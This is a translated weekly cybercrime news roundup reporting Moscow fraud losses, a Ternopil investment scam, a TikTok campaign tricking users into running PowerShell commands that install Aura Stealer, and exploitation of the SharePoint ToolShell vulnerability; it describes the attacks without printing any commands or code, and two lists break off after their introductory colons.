«Тревожные вести из мира киберпреступлений: миллиарды убытков, мошенничество через TikTok и уязвимости в системах» Translation: Worrisome News from the World of Cybercrime: Billions in Losses, TikTok Fraud, and Vulnerabilities in Systems

We’ve compiled the most significant cybersecurity news from the past week.

In the first half of 2025, cybercrime inflicted damage amounting to 34 billion rubles in Moscow. This information was shared in an interview with Interfax by Colonel Anton Kononenko, head of the Department for Combating the Illegal Use of Information and Communication Technologies of the Russian Ministry of Internal Affairs in the capital.

«Crimes are now being committed in amounts starting from one million rubles, and there are practically no minor cases left. Compared to previous years, the losses caused by cyber fraudsters in the city are on the rise,» Kononenko remarked.

Law enforcement reported that this spring, cyber fraudsters set a record by stealing 450 million rubles.

According to Kononenko, over the past three years, the extent of losses has been increasing. Previously, most investigations into thefts involved amounts up to 50,000 rubles, whereas now about 80% of identified crimes fall into the categories of serious (losses of 250,000 rubles) and especially serious offenses.

A 64-year-old resident of Ternopil fell victim to fraud, losing around 1 million hryvnias. This was reported by the press service of the Ternopil District Police Department.

As indicated by law enforcement, the victim saw an ad on social media promoting investment courses with promises of earnings. He clicked on the link and contacted someone who claimed to be a broker-analyst.

After registering on the website, the retiree began transferring money to the specified account from his electronic wallet. When the total reached $28,100, the «broker» stopped communicating, and access to the platform was blocked.

On October 17, ISC Handler analyst Xavier Mertens observed an ongoing campaign leveraging TikTok videos for hacking attacks.

Malware designed for data theft was disguised as free guides to activating popular programs like Windows, Spotify, and Netflix.

The creators of these videos employed ClickFix social engineering techniques, offering victims seemingly legitimate «solutions» or instructions.

In reality, they compel the individual to execute malicious PowerShell commands or other scripts that infect the computer.

Each video demonstrates a short one-line command and prompts viewers to run it as an administrator in PowerShell.

Once initiated, the software connects to a remote site and downloads another script that retrieves and installs two executable files from Cloudflare Pages. The first file is a variant of Aura Stealer, a malware that hijacks:

All gathered data is sent to the attackers, granting them access to the victim’s accounts.

Mertens added that an additional file, source.exe, is also downloaded, utilizing the built-in Visual C# Compiler to self-assemble code. This code is then executed in memory, with the purpose of the second module remaining unknown for now.

Hackers believed to be connected to China exploited the ToolShell vulnerability in Microsoft SharePoint to target government agencies, universities, telecommunications providers, and financial organizations. This was detailed in a report by Symantec.

The vulnerability affects locally hosted SharePoint servers and became known in July following extensive attacks by Chinese hackers. The malware can be exploited remotely without authentication to execute code and gain full access to the file system.

During this campaign, the attackers used malware typically associated with the Chinese hackers known as Salt Typhoon.

According to Symantec, ToolShell was employed to compromise various organizations in the Middle East, South America, the United States, and Africa. The attacks impacted:

Notably, the attack was conducted using legitimate executable files from Trend Micro and BitDefender. In the South America scheme, attackers utilized a file with a name similar to that of Symantec.

Researchers noted that the list of publicly available tools used in the attacks included Microsoft’s certutil, the GoGo Scanner, and the Revsocks utility, which enables data exfiltration through a remote server.